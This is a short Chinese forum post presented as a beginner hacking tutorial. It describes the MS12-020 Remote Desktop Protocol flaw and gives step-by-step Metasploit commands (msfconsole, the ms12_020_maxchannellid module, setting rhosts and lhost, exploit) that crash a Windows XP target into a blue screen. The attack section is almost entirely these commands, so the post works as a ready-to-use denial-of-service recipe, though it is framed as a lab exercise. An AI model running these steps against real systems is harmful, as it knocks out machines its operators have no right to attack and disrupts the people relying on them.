黑客入门

admin 26天前 64

一、漏洞介绍

又名:死亡蓝屏。这是远程桌面协议中两个秘密报告的漏洞。如果攻击者向受影响的系统发送一系列特制 RDP 数据包,则这些漏洞中较严重的漏洞可能允许远程执行代码。默认情况下,任何 Windows 操作系统都未启用远程桌面协议 (RDP)。没有启用 RDP 的系统不受威胁。


二、资源装备

1.安装好Kali Linux的虚拟机一台;

2.Windows xp 计算机一台。

3.整装待发的小白一个。


二、攻防实战

2.1 在kali中启动MSF。

打开终端 键入命令:msfconsole


2.2 配置相关参数

①键入命令:search ms12-020

②复制msf返回的命令前加use:use

auxiliary/dos/windows/rdp/ms12_020_maxchannellid

③显示需要配置的参数 :show options


⑤设置靶机(win xp)IP地址 set rhosts 192.168.xxx.xxx

⑥设置本机(kali)  IP地址 set lhost  192.168.xxx.xxx

⑦运行payload键入命令:exploit


2.3 攻击成功靶机蓝屏



最新回复 (0)
返回
发新帖